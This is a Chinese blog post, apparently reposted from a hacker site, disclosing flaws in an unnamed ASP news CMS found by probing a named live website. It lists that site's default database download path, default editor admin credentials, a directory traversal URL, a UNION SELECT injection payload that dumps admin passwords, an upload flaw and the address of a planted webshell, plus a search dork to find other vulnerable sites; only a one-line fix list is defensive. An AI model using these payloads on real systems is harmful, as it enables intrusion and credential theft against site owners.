通用网站系统漏洞及修复方法

最新推荐文章于 2022-11-06 14:15:13 发布
最新推荐文章于 2022-11-06 14:15:13 发布
阅读量966 收藏 1
点赞数
分类专栏: 漏洞发布_通用漏洞 文章标签: 数据库 google 工具 测试
 


今天在测试渗透一网站时,旁注发现这套程序。版权未知。
问题很多,发出来大家了解下。

请勿非法入侵他人网站/系统,否则后果自负!

默认网站数据库:

http://www.08.tv/data/nxnews.mdb (做为一个合格的站长,这个不用说怎么做了吧?)

ewebeditor 在线编辑器:

http://www.08.tv/ewebeditor/admin_login.asp
帐户/密码:admin admin

登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data

Sql注入漏洞:

http://www.08.tv/detail.asp?id=12
exp:
union select 1,admin,password,4,5,6,7,8 from admin
爆出明文帐号/密码

上传漏洞:

http://www.08.tv/manage/upfile.asp 传说中的双文件上传。当然,你也可以用工具。如明小子。
webshell: http://www.08.tv/manage/tupian/201108102214.asp

简单修复:修改默认数据库、后台路径/删除ewebedtior目录下admin_login.asp/增加防注入系统/对upfile.asp作验证

google:inurl:news.asp?lanmuName=

 

京华志: 这样的漏洞 一般是属于最初级的了 但是往往有很多站长不注意 所以还能拿下很多站的 如果想更快 更精准的获取更多BUG 0DAY

漏洞信息 请关注京华志  www.jinghuazhi.com



本文来源于:凯里黑客http://www.0855.tv ,转载请注明来处,谢谢!

qq9361235
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通用企业网站管理系统 v3.3
10-09
系统具有一定的安全防护措施,如防止SQL注入、XSS攻击等,同时定期更新和修复漏洞,确保网站的稳定运行。 10. **安装与升级** 安装过程简单快捷,且系统支持在线升级,当有新的版本或补丁发布时,用户可方便地...
网银漏洞修复汇总
07-12
网银漏洞修复是非常重要的一环,黑客们需要了解各种漏洞的类型和防御方法来保护金融行业的安全。同时,我们也需要了解金融行业的安全需求和相关的法律法规,以确保我们的修复活动符合相关的法律法规和标准。
Web通用漏洞简介
Breeze的博客
01-20 1万+
本篇文章主要简单介绍一下(我能想到的)Web通用漏洞(以OWASP体系为主,非组件引起的,可能出现在任何语言任何环境中的web漏洞)的原理以及简单的攻击者利用方式。注:看本篇文章不会学到任何新技术,但如果本篇文章里存在任何你感兴趣却不了解的技术,可以去其他地方查阅资料。当然文章中也有很多错误,也希望能获得指正。 文章目录注入SQL注入基于利用方式分类union回显注入报错回显注入布尔盲注延时盲注...
【USB】全球USB厂家 USB ID大全。更新时间:2017-07-29
shen_wei的专栏
08-15 7万+
# # List of USB ID's # # Maintained by Stephen J. Gowdy # If you have any new entries, please submit them via # http://www.linux-usb.org/usb-ids.html # or send entries as patches (diff -u old new) i
【USB】全球USB厂家 USB ID大全。更新时间:2018-01-04
热门推荐
shen_wei的专栏
01-31 7万+
# # List of USB ID's # # Maintained by Stephen J. Gowdy # If you have any new entries, please submit them via # http://www.linux-usb.org/usb-ids.html # or send entries as patches (diff -u old new) i
韩国网站的一些弱口令
asli33的专栏
04-28 2966
<br />转自:http://www.0855.tv/post/kobz.htm<br /> <br /><br /> 账号一般为:域名和 admin,其他就要猜了,域名的概率为:10%,admin:30%。<br /><br /> 密码一般是:0000,这个很多,1111,这个更多,qweqwe,也很多,com!@#,这个要注意了,也有很多人用,123123,也有,!@#!@#,也有,comcom!@#。<br /><br /> 在列下:<br /> username0000<br /> us
USB VID&PID 表
xqhrs232的专栏
03-12 4万+
原文地址::http://blog.csdn.net/bai_hei1025/article/details/23879165 相关文章 1、USB设备的VID与PID----http://blog.csdn.net/tankai19880619/article/details/8642066
修复bash漏洞的4.3.30源码包
10-15
y bash 命令进行漏洞修复,如采用RPM包升级修复漏洞又存在各服务器系统有的是32位有的是64位或者bash的版本不一样导致需要各种版本的RPM包的问题,故整合最新的4.3.30源码包通用。使用方式:解压并进入目录(tar ...
适用于各种Linux系统漏洞修复的最新OpenSSH8.3p1通用安装包,可用于centos/redhat/ubuntu等
07-13
7. **漏洞修复**: 每次OpenSSH的更新都会修复已知的安全漏洞。因此,及时升级OpenSSH有助于保护系统免受潜在攻击。对于企业级服务器,定期检查并应用这些更新是必要的安全实践。 8. **配置和安全增强**: OpenSSH ...
dedecms重装漏洞
weixin_43778463的博客
11-06 841
dedecms重装漏洞漏洞版本v5.7
PHP网站漏洞怎么修复和查找漏洞
网站安全专家
03-25 2962
ecshop目前最新版本为4.0,是国内开源的一套商城系统,很多外贸公司,以及电商平台都在使用,正因为使用的人数较多,很多攻击者都在挖掘该网站漏洞,就在最近ecshop被爆出高危漏洞,该漏洞利用跨站伪造函数,来对网站数据库进行攻击。 ecshop 漏洞详情 该网站漏洞发生的根本原因是根目录下的user.php文件,在第315-365行里的代码里,该代码主要是处理用户注册,用户登录的一些...
网站漏洞渗透检测过程与修复方案
网站安全专家
12-27 656
什么是网站渗透测试? 该如何做网站安全检测 网站的渗透测试简单来 说就是模拟攻击者的手法以及攻击手段去测试网站漏洞,对网站进行渗透攻击测试,对网站的代码漏洞进行挖掘,上传脚本文件获取网站的控 制权,并对测试出来的漏洞以及整体的网站检测出具详细的渗透测试安全报告。 渗透测试的流程一般都是要对网站的域 名以及其他相关信息,包括服务器系统,服务器IP,网站使用的主流CMS系统进行手动的获取与安...
常见web漏洞及防范(转)
hackerie的博客
01-22 1万+
单个漏洞,需要进行排查与整改,借着别人的智慧,做一个简单的收集。最好能够将常见漏洞,不限于web类的,进行一个统一的整理。这是今年的任务。 进行漏洞工具的收集,为未来的工作做好基础。。。 一、SQL注入漏洞 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串中夹带的S...
一般网站有哪些常见漏洞
weixin_33912453的博客
09-26 7611
Web应用是指采用B/S架构、通过HTTP/HTTPS协议提供服务的统称。随着互联网的广泛使用,Web应用已经融入到日常生活中的各个方面:网上购物、网络银行应用、证券股票交易、政府行政审批等等。在这些Web访问中,大多数应用不是静态的网页浏览,而是涉及到服务器侧的动态处理。此时,如果Java、PHP、ASP等程序语言的编程人员的安全意识不足,对程序参数输...
MetInfo最新网站漏洞如何修复以及网站安全防护
网站安全专家
10-22 1977
metinfo漏洞于2018年10月20号被爆出存在sql注入漏洞,可以直接拿到网站管理员的权限,网站漏洞影响范围较广,包括目前最新的metinfo版本都会受到该漏洞的攻击,该metinfo漏洞产生的主要原因是可以绕过metinfo的安全过滤函数,导致可以直接插入恶意的sql注入语句执行到网站的后端里去,在数据库里执行管理员操作的一些功能,甚至可以直接sql注入到首页文件index.php去获取到...
Excms 重装漏洞
weixin_33835690的博客
05-30 213
看了下乌云镜像标题里面‘爆任意文件’好奇下载此系统学习下,比较老的系统,安装完,并没有找到该文件:/apps/include.php 链接地址:http://wooyun.fbisb.com/bug_detail.php?wybug_id=wooyun-2011-03565 程序下载地址:http://www.mycodes.net/43/1073.htm 文件:/install/in...
数据库查询工具 - Aqua Data Studio - 4ngel's blog 京华志
浓缩精华 方成志 京华志
10-04 1910
官方地址:http://www.aquafold.com/cns/index.html Aqua Data Studio 是供数据库管理员、软件开发员和业务分析师使用的一个完整的集成开发环境 (IDE)。它可提供四大功能领域:1) 数据库查询与管理工具;2) 一套数
2022年信息安全漏洞通报1月.pdf
最新发布
05-11
2022年1月的信息安全漏洞通报显示,国家信息安全漏洞库(CNNVD)在该月共报告了2054个安全漏洞,其中包括信息技术产品(通用漏洞)279个和网络信息系统(事件型漏洞)39796个,其中大部分是通过漏洞平台推送的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值